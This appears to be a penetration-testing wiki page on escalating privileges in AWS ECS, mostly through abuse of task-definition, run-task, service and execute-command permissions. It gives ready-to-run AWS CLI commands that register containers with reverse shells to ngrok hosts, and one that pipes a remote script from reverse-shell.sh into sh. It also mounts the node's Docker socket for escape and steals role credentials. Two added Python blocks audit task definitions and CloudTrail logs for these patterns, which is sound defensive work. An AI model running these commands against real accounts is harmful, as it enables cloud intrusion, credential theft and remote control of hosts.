AWS - ECS Privesc

ECS

More information about ECS can be found in:

AWS - ECS Enum

iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask

An attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:RunTask permissions in ECS can create a new task definition with a malicious container that steals the metadata credentials, and run it.

```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --requires-compatibilities "[\"FARGATE\"]" \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
# (a space is needed before each trailing backslash; "512\" would glue the next option onto 512)

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
  --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
  --launch-type FARGATE \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```

Potential Impact: Direct privesc to a different ECS role.

iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask

As in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:StartTask permissions in ECS can create a new task definition with a malicious container that steals the metadata credentials, and run it. However, in this case, a container instance must exist to run the malicious task definition on.

```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Start the task on an existing container instance
aws ecs start-task --task-definition iam_exfiltration \
  --container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```

Potential Impact: Direct privesc to any ECS role.

iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)

As in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:UpdateService or ecs:CreateService permissions in ECS can create a new task definition with a malicious container that steals the metadata credentials, and run it by creating a new service (or updating an existing one) with at least 1 task running.

```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn "$ECS_ROLE_ARN" \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --requires-compatibilities "[\"FARGATE\"]" \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
  --task-definition iam_exfiltration \
  --desired-count 1 \
  --cluster "$CLUSTER_ARN" \
  --launch-type FARGATE \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
  --service <SERVICE NAME> \
  --task-definition <NEW TASK DEFINITION NAME>
```

Potential Impact: Direct privesc to any ECS role.

ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

This scenario is like the previous ones but without the iam:PassRole permission. It is still interesting because if you can run an arbitrary container, even one without a role, you can run a privileged container to escape to the node and steal the EC2 IAM role and the roles of the other ECS containers running on that node. You could even force other tasks to run inside the EC2 instance you compromised in order to steal their credentials (as discussed in the Privesc to node section).

This attack is only possible if the ECS cluster is using EC2 and not Fargate.

```bash
# Container definition mounting the node's Docker socket into the container
printf '[
  {
    "name": "exfil_creds",
    "image": "python:latest",
    "entryPoint": ["sh", "-c"],
    "command": ["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
    "mountPoints": [
      {
        "readOnly": false,
        "containerPath": "/var/run/docker.sock",
        "sourceVolume": "docker-socket"
      }
    ]
  }
]' > /tmp/task.json

# Host volume backing that mount point
printf '[
  {
    "name": "docker-socket",
    "host": {
      "sourcePath": "/var/run/docker.sock"
    }
  }
]' > /tmp/volumes.json

# Register the task definition for EC2 launch type (no task role needed)
aws ecs register-task-definition --family iam_exfiltration \
  --cpu 256 --memory 512 \
  --requires-compatibilities '["EC2"]' \
  --container-definitions file:///tmp/task.json \
  --volumes file:///tmp/volumes.json

# Run it on the EC2-backed cluster
aws ecs run-task --task-definition iam_exfiltration \
  --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
  --launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
```
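The docker-socket mount above is exactly the kind of setting a defender wants to catch before a task ever launches. The following is an added example (not HackTricks code and not an AWS tool) that audits a task definition in the shape returned by `aws ecs describe-task-definition` for host-path volumes, privileged containers and host PID/network mode; the sample task definition is constructed to mirror the one registered above.

```python
"""Audit an ECS task definition (describe-task-definition shape) for node-escape risk.
Added example, not HackTricks code; the sample mirrors the docker-socket task above."""
import json

# Host paths that give a container control of the EC2 node or access to its credentials.
RISKY_HOST_PATHS = {"/", "/run", "/var/run", "/run/docker.sock",
                    "/var/run/docker.sock", "/proc", "/sys", "/etc", "/root"}

def audit_task_definition(task_def):
    """Return human-readable findings; an empty list means no risky settings were found."""
    findings, risky_volumes = [], {}  # risky_volumes: volume name -> host path
    for vol in task_def.get("volumes", []):
        path = (vol.get("host") or {}).get("sourcePath")  # None for ephemeral volumes
        if path and (path.rstrip("/") or "/") in RISKY_HOST_PATHS:
            risky_volumes[vol["name"]] = path
    if task_def.get("pidMode") == "host":
        findings.append("task shares the host PID namespace (pidMode=host)")
    if task_def.get("networkMode") == "host":
        findings.append("task uses host networking (networkMode=host)")
    for container in task_def.get("containerDefinitions", []):
        name = container.get("name", "<unnamed>")
        if container.get("privileged"):
            findings.append(f"container {name} runs privileged")
        for mount in container.get("mountPoints", []):
            host_path = risky_volumes.get(mount.get("sourceVolume"))
            if host_path:
                mode = "read-only" if mount.get("readOnly") else "read-write"
                findings.append(f"container {name} mounts host path {host_path} "
                                f"{mode} at {mount.get('containerPath')}")
    return findings

# Constructed sample: the fields `aws ecs describe-task-definition` returns for the
# task registered above that the audit reads.
SAMPLE_TASK_DEF = json.loads("""{
  "family": "iam_exfiltration", "requiresCompatibilities": ["EC2"],
  "volumes": [{"name": "docker-socket", "host": {"sourcePath": "/var/run/docker.sock"}}],
  "containerDefinitions": [{"name": "exfil_creds", "image": "python:latest",
    "mountPoints": [{"sourceVolume": "docker-socket",
                     "containerPath": "/var/run/docker.sock", "readOnly": false}]}]
}""")

if __name__ == "__main__":
    for finding in audit_task_definition(SAMPLE_TASK_DEF):
        print("FINDING:", finding)
```

Feeding it every revision from `aws ecs list-task-definitions` gives a quick inventory of task families that could be used for a node escape on EC2-backed clusters.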

ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

An attacker with ecs:ExecuteCommand and ecs:DescribeTasks can execute commands inside a running container and exfiltrate the IAM role attached to it (the describe permission is needed because aws ecs execute-command requires it). However, for this to work the container instance must be running the ExecuteCommand agent (which it isn't by default).

Therefore, the attacker could try to:

  • Try to execute a command in every running container

```bash
# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq -r '.clusterArns[]'); do
  echo "Cluster $cluster"
  for task in $(aws ecs list-tasks --cluster "$cluster" | jq -r '.taskArns[]'); do
    echo "  Task $task"
    # If true, it's your lucky day
    aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
  done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
  --command "sh" \
  --cluster "$CLUSTER_ARN" \
  --task "$TASK_ARN"
```

  • If they have ecs:RunTask, run a task with aws ecs run-task --enable-execute-command [...]

  • If they have ecs:StartTask, run a task with aws ecs start-task --enable-execute-command [...]

  • If they have ecs:CreateService, create a service with aws ecs create-service --enable-execute-command [...]

  • If they have ecs:UpdateService, update a service with aws ecs update-service --enable-execute-command [...]

You can find examples of those options in the previous ECS privesc sections.

Potential Impact: Privesc to a different role attached to containers.
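From the defender's side, the register-then-launch chain of the iam:PassRole sections above and the --enable-execute-command launches listed here both leave a trail in CloudTrail. The following added example (not HackTricks or AWS code) flags, over constructed CloudTrail events, a principal who registers a task definition carrying a taskRoleArn and launches it within 30 minutes, any launch with enableExecuteCommand, and any ExecuteCommand call; the account id and principal ARNs are placeholders.

```python
"""Flag register-then-launch and ExecuteCommand patterns in ECS CloudTrail events.
Added example, not HackTricks code; the events below are constructed in CloudTrail shape."""
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)  # a launch this soon after RegisterTaskDefinition is suspicious
LAUNCH_EVENTS = {"RunTask", "StartTask", "CreateService", "UpdateService"}

def family_of(task_def_ref):
    """'arn:...:task-definition/fam:3', 'fam:3' or 'fam' -> 'fam'."""
    return task_def_ref.rsplit("/", 1)[-1].split(":", 1)[0]

def event_time(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def detect(events):
    """Return alert strings for suspicious ECS activity, processing events in time order."""
    alerts, registered = [], {}  # (principal, family) -> (time, taskRoleArn)
    for ev in sorted(events, key=event_time):
        if ev.get("eventSource") != "ecs.amazonaws.com":
            continue
        name, who = ev["eventName"], ev["userIdentity"]["arn"]
        params = ev.get("requestParameters") or {}
        if name == "RegisterTaskDefinition" and params.get("taskRoleArn"):
            # Task definition passes a role: remember who registered it and when.
            registered[(who, params.get("family", ""))] = (event_time(ev), params["taskRoleArn"])
        elif name in LAUNCH_EVENTS:
            fam = family_of(params.get("taskDefinition", ""))
            hit = registered.get((who, fam))
            if hit and event_time(ev) - hit[0] <= WINDOW:
                alerts.append(f"{who} registered {fam} with {hit[1]} and launched it via {name}")
            if params.get("enableExecuteCommand"):
                alerts.append(f"{who} launched {fam or '?'} with enableExecuteCommand via {name}")
        elif name == "ExecuteCommand":
            alerts.append(f"{who} ran ExecuteCommand in task {params.get('task')}")
    return alerts

def make_event(time, name, arn, **params):  # build a constructed event in CloudTrail shape
    return {"eventTime": time, "eventSource": "ecs.amazonaws.com", "eventName": name,
            "userIdentity": {"arn": arn}, "requestParameters": params}

DEV = "arn:aws:iam::111122223333:user/dev"  # constructed principal
SAMPLE_EVENTS = [
    make_event("2024-05-01T10:00:00Z", "RegisterTaskDefinition", DEV, family="iam_exfiltration",
               taskRoleArn="arn:aws:iam::111122223333:role/ecsTaskExecutionRole"),
    make_event("2024-05-01T10:02:00Z", "RunTask", DEV, taskDefinition="iam_exfiltration:1",
               cluster="API", launchType="FARGATE", enableExecuteCommand=True),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT:", alert)
```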

ssm:StartSession

Check in the ssm privesc page how you can abuse this permission to privesc to ECS:

AWS - SSM Privesc

iam:PassRole, ec2:RunInstances

Check in the ec2 privesc page how you can abuse these permissions to privesc to ECS:

AWS - EC2 Privesc

?ecs:RegisterContainerInstance

TODO: Is it possible to register an instance from a different AWS account so that tasks are run on machines controlled by the attacker??

ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets

TODO: Test this

An attacker with the ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet and ecs:DescribeTaskSets permissions can create a malicious task set for an existing ECS service and make it the primary task set. This lets the attacker execute arbitrary code within the service.

```bash
# Register a task definition with a reverse shell
echo '{
  "family": "malicious-task",
  "containerDefinitions": [
    {
      "name": "malicious-container",
      "image": "alpine",
      "command": [
        "sh",
        "-c",
        "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
      ]
    }
  ]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service \
  --task-definition malicious-task \
  --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service \
  --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
```

Potential Impact: Execute arbitrary code in the affected service, impacting its functionality or exfiltrating sensitive data.
